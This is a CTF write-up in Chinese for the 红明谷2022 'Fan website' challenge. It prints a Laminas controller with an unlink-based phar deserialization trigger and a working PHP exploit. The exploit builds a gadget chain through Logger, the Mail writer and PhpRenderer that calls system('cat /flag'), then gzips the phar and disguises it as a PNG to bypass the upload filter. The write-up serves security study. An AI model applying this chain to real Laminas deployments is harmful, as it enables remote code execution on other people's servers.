红明谷2022 web Fan website

源码泄露

www.zip，查看路由

在composer.json中查看版本号，是2.11，存在已知的链子

这个框架的路由一般在/module/Application/config/module.config.php中

在本题目中，/module目录下有两个文件夹，一个是Application，一个是Album

查看/module/src/Controller/AlbumController.php

<?php
namespace Album\Controller;use Album\Model\AlbumTable;
use Laminas\Mvc\Controller\AbstractActionController;
use Laminas\View\Model\ViewModel;
use Album\Form\AlbumForm;
use Album\Form\UploadForm;
use Album\Model\Album;class AlbumController extends AbstractActionController
{// Add this property:private $table;private $white_list;public function __construct(AlbumTable $table){$this->table = $table;//白名单设置$this->white_list = array('.jpg','.jpeg','.png');}//默认主页public function indexAction(){return new ViewModel(['albums' => $this->table->fetchAll(),]);}//添加信息public function addAction(){$form = new AlbumForm();$form->get('submit')->setValue('Add');$request = $this->getRequest();if (! $request->isPost()) {return ['form' => $form];}$album = new Album();$form->setInputFilter($album->getInputFilter());$form->setData($request->getPost());if (! $form->isValid()) {return ['form' => $form];}$album->exchangeArray($form->getData());$this->table->saveAlbum($album);return $this->redirect()->toRoute('album');}//修改信息public function editAction(){$id = (int) $this->params()->fromRoute('id', 0);if (0 === $id) {return $this->redirect()->toRoute('album', ['action' => 'add']);}// Retrieve the album with the specified id. Doing so raises// an exception if the album is not found, which should result// in redirecting to the landing page.try {$album = $this->table->getAlbum($id);} catch (\Exception $e) {return $this->redirect()->toRoute('album', ['action' => 'index']);}$form = new AlbumForm();$form->bind($album);$form->get('submit')->setAttribute('value', 'Edit');$request = $this->getRequest();$viewData = ['id' => $id, 'form' => $form];if (! $request->isPost()) {return $viewData;}$form->setInputFilter($album->getInputFilter());$form->setData($request->getPost());if (! $form->isValid()) {return $viewData;}$this->table->saveAlbum($album);// Redirect to album listreturn $this->redirect()->toRoute('album', ['action' => 'index']);}//删除信息public function deleteAction(){$id = (int) $this->params()->fromRoute('id', 0);if (!$id) {return $this->redirect()->toRoute('album');}$request = $this->getRequest();if ($request->isPost()) {$del = $request->getPost('del', 'No');if ($del == 'Yes') {$id = (int) $request->getPost('id');$this->table->deleteAlbum($id);}// Redirect to list of albumsreturn $this->redirect()->toRoute('album');}return ['id'    => $id,'album' => $this->table->getAlbum($id),];}public function imgdeleteAction(){$request = $this->getRequest();if(isset($request->getPost()['imgpath'])){$imgpath = $request->getPost()['imgpath'];$base = substr($imgpath,-4,4);if(in_array($base,$this->white_list)){     //白名单//反序列化触发点@unlink($imgpath);}else{echo 'Only Img File Can Be Deleted!';}}}//图片上传public function imguploadAction(){$form = new UploadForm('upload-form');$request = $this->getRequest();if ($request->isPost()) {// Make certain to merge the $_FILES info!$post = array_merge_recursive($request->getPost()->toArray(),$request->getFiles()->toArray());$form->setData($post);if ($form->isValid()) {$data = $form->getData();$base = substr($data["image-file"]["name"],-4,4);if(in_array($base,$this->white_list)){   //白名单限制$cont = file_get_contents($data["image-file"]["tmp_name"]);//对上传的文件的内容进行限制if (preg_match("/<\?|php|HALT\_COMPILER/i", $cont )) {die("Not This");}//图片有大小要求if($data["image-file"]["size"]<3000){die("The picture size must be more than 3kb");}//图片存放的路径$img_path = realpath(getcwd()).'/public/img/'.md5($data["image-file"]["name"]).$base;//将路径回显echo $img_path;$form->saveImg($data["image-file"]["tmp_name"],$img_path);}else{echo 'Only Img Can Be Uploaded!';}// Form is valid, save the form!//return $this->redirect()->toRoute('upload-form/success');}}return ['form' => $form];}}

不同的方法对应不同的路由，相应的路由对应相应的功能

进行phar反序列化，注意上传的文件有大小限制，需要在生成phar文件的时候塞入垃圾信息，让文件大小>3KB

phar反序列化

exp

<?phpnamespace Laminas\View\Resolver{class TemplateMapResolver{protected $map = ["setBody"=>"system"];}
}
namespace Laminas\View\Renderer{class PhpRenderer{private $__helpers;function __construct(){$this->__helpers = new \Laminas\View\Resolver\TemplateMapResolver();}}
}namespace Laminas\Log\Writer{abstract class AbstractWriter{}class Mail extends AbstractWriter{protected $eventsToMail = ["cat /flag"];protected $subjectPrependText = null;protected $mail;function __construct(){$this->mail = new \Laminas\View\Renderer\PhpRenderer();}}
}namespace Laminas\Log{class Logger{protected $writers;function __construct(){$this->writers = [new \Laminas\Log\Writer\Mail()];}}
}namespace{$a = new \Laminas\Log\Logger();//echo base64_encode(serialize($a));@unlink('test.phar');$phar=new Phar('test.phar');$phar->startBuffering();//设置头部$phar->setStub('<?php __HALT_COMPILER(); ?>');//将自定义的meta-data存入manifest$phar->setMetadata($a);$phar->addFromString("test.txt",file_get_contents("test.txt"));//$phar->addFromString("test.txt","test");//签名自动计算$phar->stopBuffering();
}

gzip test.phar

然后修改文件后缀为png
上传成功后，回显上传的位置

/var/www/public/img/364be8860e8d72b4358b5e88099a935a.png

然后在delete路由里，触发phar反序列化，得flag

参考链接

1. Zend FrameWork Pop Chain - 先知社区 (aliyun.com)